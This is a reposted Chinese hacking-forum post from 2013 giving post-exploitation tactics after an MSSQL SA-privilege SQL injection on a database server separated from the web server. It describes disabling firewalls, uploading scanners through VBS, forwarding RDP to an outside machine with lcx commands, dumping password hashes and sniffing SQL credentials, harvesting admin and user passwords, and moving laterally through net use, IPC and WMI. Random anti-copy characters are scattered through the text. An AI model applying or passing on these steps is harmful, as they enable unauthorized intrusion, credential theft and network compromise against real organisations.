当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
# Z9 w5 U' n* f' P! U. H5 O- \7 c
1 n5 z3 Q* `* I0 Y( M2 t6 K3 u- Y% t! l& c, \+ j; }$ K
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)0 t& Z3 q' E5 e/ K8 D* h6 z" W
9 r' F0 z; X1 F! T' u/ r9 t1 e# l2 ~; N/ `$ Y/ U2 @
一、DB机有公网IP.
# A& {! d! D! f5 R$ Q
7 t9 _7 E, q) u1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
+ G& P6 t2 }: Z
* i9 W( i( s& v) S, k! ^. X/ x
0 c7 P7 @" F) L2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
1 a3 G4 P4 p7 G" w
4 k7 u/ C6 |3 J* K- }- I4 H% `5 |1 @' n
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com% `% f4 g' W/ f: i
3 C1 O0 S3 ~ G0 u) ]8 d D
. `4 W! j" d& ]6 u8 y2 F4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
( ^4 y4 D/ h; H1 e" {
; p+ }/ t9 q1 f. ^- s
5 N7 I9 H( G( Y) k8 `9 }. x9 T+ C1 q/ t- z4 P% \
二、DB机只有内网IP7 P% }, z- ]2 Q
' b2 w' A8 g5 i f7 O. T6 N4 i3 D
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.# M" k4 Z. r. e( N& @5 s
9 A# g8 c& l+ t7 U* j
8 Q! ^5 y; {# }" ]& ^2:停掉防火墙和IP策略再从内往外扫描.% v3 s! z i- U0 N# v9 q0 T& L* h3 ^
2 n, T$ E0 u4 A! n: B* M
# g# W3 _8 N2 Z/ b
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.& x# V# R5 g2 c
1 [# F6 }# x8 C# I
7 n; T" D1 O3 C4:学会密码规律分析往往会有惊喜.# c" y3 U9 Y; \ m: y5 |2 K
% {3 J/ X0 J" z3 b
. R. |; H1 {1 d' p( u5 p5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等# c6 l& j! P( U. [& X5 S
! ?# P, |2 a* M# A5 ~$ a
: T! w- q0 i6 D2 W1 W有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
分享
支持
反对